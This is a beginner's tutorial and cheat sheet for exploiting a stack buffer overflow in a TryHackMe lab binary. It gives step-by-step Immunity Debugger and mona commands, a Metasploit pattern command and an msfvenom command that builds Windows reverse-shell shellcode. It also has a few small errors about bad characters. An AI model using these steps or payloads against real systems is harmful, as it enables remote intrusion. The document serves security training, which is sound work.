Buffer Overflow Notes and Cheat sheet
Hello everyone! In this writeup, we are going to cover a server-side vulnerability called buffer overflow completely for a beginner. First, I’ll tell you the theory and logic behind buffer overflow, including why it occurs and which memory flaw it uses.
Theory Notes
First, let’s discuss: what is a buffer? in the easiest way.
Buffer is a region of memory used to temporarily hold data while it is being moved from one place to another…
For every input, there is specific memory allocated.
for example:
Look at this login portal; it takes two inputs, username and password, and it is expected that if we submit a long string, it will raise an error, but if the code is poorly written, it will take the entire string more than the size it has allocated to that input. The buffer will then overflow, allowing us to obtain a reverse shell. So, let’s dive deep into the memory and understand more.
Look at this great diagram.
Anatomy of memory:
Let’s visualize: we have the kernel at the top and text at the bottom, and for easier understanding, let’s visualize the kernel as a bunch of ones (1111) and the text as a bunch of zeros (0000).
And if we dive deeper, we have a stack where things get interesting.
Buffer space loads all input data, and if we throw a bunch of characters into buffer space that exceed the allocated size, it will start overflowing data to EBP (Extended Base Pointer) and then EIP (Extended Instruction Pointer). EIP is the place where things get malicious; it is the pointer address, so we can point it in a direction that we instruct, and this direction is going to be malicious code, basically a reverse shell.
Now it’s time for a practical cheatsheet :)
Cheat sheet
Steps to Exploit buffer overflow:
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding Bad Character
- Finding a jmp point
- Generating Shellcode
- Getting shell
Tools required:
> Immunity Debugger
https://debugger.immunityinc.com/
> Mona Module
Mona installation
Drop mona.py into the ‘PyCommands’ folder
Immunity Debugger\PyCommands
Install Python 2.7.14 or higher
Let’s get Started :=>
Launch immunity Debugger as administrator, then open the file which has BOF (Buffer Overflow) vulnerability:
so in this we have a vulnerable code file named oscp.exe, it’s from the tryhackme buffer overflow room. You can also try that room; it’s one of the best resources for buffer overflow.
Mona configuration:
We have to run every mona commands from the immunity debugger.
!mona config -set workingfolder C:\mona\%p
Fuzzing
We have to figure out first after how many bytes the program is getting crashed, so for this we will use a simple python script. If you know python, try to make it on your own, or if you don’t know or want to save time, I’ve coded it for you.
You just have to modify few variables of the script:
Run it…
When the application crashes EIP should be equal to 41414141 (hec value of “AAAA”)
Finding the offset
We must now find offset to determine how many A’s it takes to reach EIP, which requires us to generate a cyclic pattern.
We will use the size that we got from fuzzer.py.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <size>
The size must be higher than the crash offset. Now we have to make a new Python script, which you can also get from my GitHub; it’s exploit.py.
Modify the payload variable by the cyclic pattern.
Re-run the exploit, the application should crash.
To find the exact offset use:
!mona findmsp -distance <size>
Use same size which we’ve used to create the pattern. The result should be something like:
Focus on EIP contains normal pattern: … (offset xxxx)
Now we have to modify some variables from exploit.py
offset = <offset>
retn = “BBBB”
now re run exploit.py, If everything is done correctly EIP will be equal to 42424242 (hex value of “BBBB”).
Finding Bad Character
Bad characters can cause issue in the development of the exploit. We must run every byte through the program to find bad characters.
The null byte (\x00) is always considered a bad character as it will truncate shell code when executed.
We will generate the list of bad characters with mona:
!mona bytearray -b “\x00”
Copy and paste the result in variable payload in exploit.py. The application should crash now to find those bad characters use this cmd.
!mona compare -f C:\<path>\bytearray.bin -a <esp_address>
To find esp_address look at the top right in immunity.
Bad chars will look something like this..
Bad characters are those in the table with 0a or 0b below them, indicating that they are missing.
Always remember that sometimes bad characters also make their adjacent characters bad, so try both 0a and 0d set separately.
Remove them by using:
!mona bytearray -b “\x00< bytearray>”
EXAMPLE:-
!mona bytearray -b “\x00\x8c\xae\xbe\xfb”
Then compare to see which bad characters were successfully eliminated:
!mona compare -f C:\<path>\bytearray.bin -a <esp_address>
Finding a jmp point
Because we already know EIP is the pointer address, we must now find a jmp point to which we can point.
This command will be used in mona.
!mona jmp -r esp -cpb “<Bad_Chars>”
From the result, choose an address and write it backwards like this:
#Example of a JMP ESP address
0x625011af
# in exploit.py write it as
retn = “\xaf\x11\x50\x62”
Generating Shellcode
We can create our shell code without using the badchars we discovered:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b “<BAD_CHARS>” -f c
Copy the generated shellcode and edit payload variable in exploit.py.
put padding variable in exploit.py as:
padding = “\x90” * 16
Getting shell
start listener and run exploit.py.
Here we Got shell !!!!
So it’s my first time explaining any topic, so please ignore my mistakes and follow me for daily cybersecurity content.
